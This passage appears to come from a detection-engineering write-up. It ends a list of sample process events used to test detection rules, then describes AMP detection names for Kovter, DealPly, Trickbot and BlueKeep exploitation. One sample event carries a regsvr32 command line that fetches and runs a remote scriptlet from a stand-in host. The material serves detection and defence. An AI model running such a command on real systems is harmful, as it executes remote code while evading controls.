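                 "regsvr32.exe /s /i:http://example.invalid/remote.sct scrobj.dll"),
    ProcessEvent(r"C:\Windows\explorer.exe", PS, "powershell.exe Get-Date"),  # benign
]
```

Each rule fires exactly once on the sample batch and the benign PowerShell event matches nothing; the names of the rules mirror the AMP detection names listed above so hits can be compared against them.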
Kovter injection detected - (536)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Dealply adware detected - (126)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Trickbot malware detected - (122)
Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
CVE-2019-0708 detected - (117)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.